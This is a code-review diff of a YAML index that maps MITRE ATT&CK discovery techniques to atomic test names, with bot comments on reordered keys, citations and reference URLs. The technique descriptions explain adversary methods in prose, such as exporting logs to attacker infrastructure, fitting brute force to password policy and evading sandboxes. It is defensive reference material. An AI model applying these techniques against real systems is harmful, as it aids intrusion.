Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -56500,12 +57188,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -56513,11 +57200,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
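Review bot: the new third paragraph of the T1654 description introduces `(Citation: Permiso GUI-Vil 2023)`, and the matching external_references entry for that key is only added in a later hunk of this object. That is fine when the patch lands whole, but a partial apply or cherry-pick of the description change alone would leave a dangling citation key. The blank `+` line before the paragraph is correct inside the `|-` block scalar; it is what preserves the paragraph break.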
@@ -56528,7 +57218,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -56542,6 +57232,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -56561,56 +57255,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -56632,19 +57281,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
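Review bot: most of this hunk is key reordering rather than a content change (the platforms, domains, contributors, external_references and STIX identity fields deleted for T1087.004 in the previous hunk reappear here in a different order), which buries the edits that matter: the platform list changes from Azure AD / Office 365 / Google Workspace to Office Suite / Identity Provider, `x_mitre_permissions_required` is dropped, `revoked: false` is added and `x_mitre_version` goes from 1.2 to 1.3. Emitting keys in a fixed order from the generator would keep future syncs reviewable. Also leave `source_name: Google Cloud - IAM Servie Accounts List API` misspelled as it is: `source_name` values are the keys that the `(Citation: ...)` markers in descriptions resolve against, so correcting the spelling in this one place would break resolution.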
@@ -56715,7 +57406,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -56742,41 +57432,7 @@ discovery:
name: sh
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -56800,6 +57456,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -56810,9 +57469,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -56822,12 +57486,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
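Review bot: the Deloitte Environment Awareness reference changes in two ways that should be checked together: the Google Drive URL gains an `/edit` suffix and the retrieved date moves to September 13, 2024. Verify that the new URL opens without sign-in before merging, since the plain file link was the one previously recorded as retrieved. The rest of the hunk is the same key reordering as for T1087.004, plus `modified` for T1069.001 stepping back from 2023-05-09 to 2023-04-07 (see the note on T1619 for the likely reason).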
@@ -56870,7 +57561,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery (Local)
@@ -56892,7 +57582,7 @@ discovery:
name: sh
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -56903,28 +57593,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -56957,9 +57650,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests:
- name: Examine password policy - macOS
@@ -57012,7 +57704,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -57051,13 +57743,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
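Review bot: T1614.001 loses `x_mitre_attack_spec_version: 2.1.0` here with no replacement visible, whereas every other technique in this patch keeps the field at 3.1.0 or 3.2.0. Unless the generator now emits it earlier in this object, T1614.001 becomes the only technique without an ATT&CK spec version, which anything comparing spec versions across the index will trip on. Note also that `x_mitre_permissions_required: - User` survives for T1614.001 while the same field is removed from T1087.004 and T1614 in this patch; that is consistent with this object's `modified` going back to 2021-10-15 (upstream has not re-issued it), but it is worth stating explicitly so the inconsistency is not mistaken for an oversight.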
@@ -57098,87 +57788,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests:
- name: Get geolocation info through IP-Lookup services using curl freebsd, linux
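Review bot: two substantive changes in the T1614 block are hidden among the reordering and deserve a line in the commit message: the FBI Ragnar Locker reference moves from `assets.documentcloud.org` to `s3.documentcloud.org` with the retrieved date updated to September 12, 2024, and `x_mitre_permissions_required` is dropped while `revoked: false` is added and `x_mitre_version` goes from 1.0 to 1.1. The description and detection text are unchanged (the removed `description: |2-` and `x_mitre_detection: |-` blocks on the old side are byte-for-byte the ones re-added on the new side), so this hunk carries no wording change despite its size.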
@@ -57253,7 +57941,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery - ps (macOS)
@@ -57270,12 +57957,12 @@ discovery:
name: sh
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
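Review bot: the T1526 description now says "Microsoft Graph API" where it said "Azure AD Graph API", but the sentence still ends with `(Citation: Azure AD Graph API)`, so it cites a source named for the API it no longer mentions. The marker must stay as-is because it is the key of the corresponding external_references entry (outside this hunk); since the wording change arrives with the same upstream rename seen in the first paragraph (Azure AD to Entra ID), treat this as an upstream text/reference mismatch to flag rather than something to patch locally, and do not edit the citation key alone.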
@@ -57283,10 +57970,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
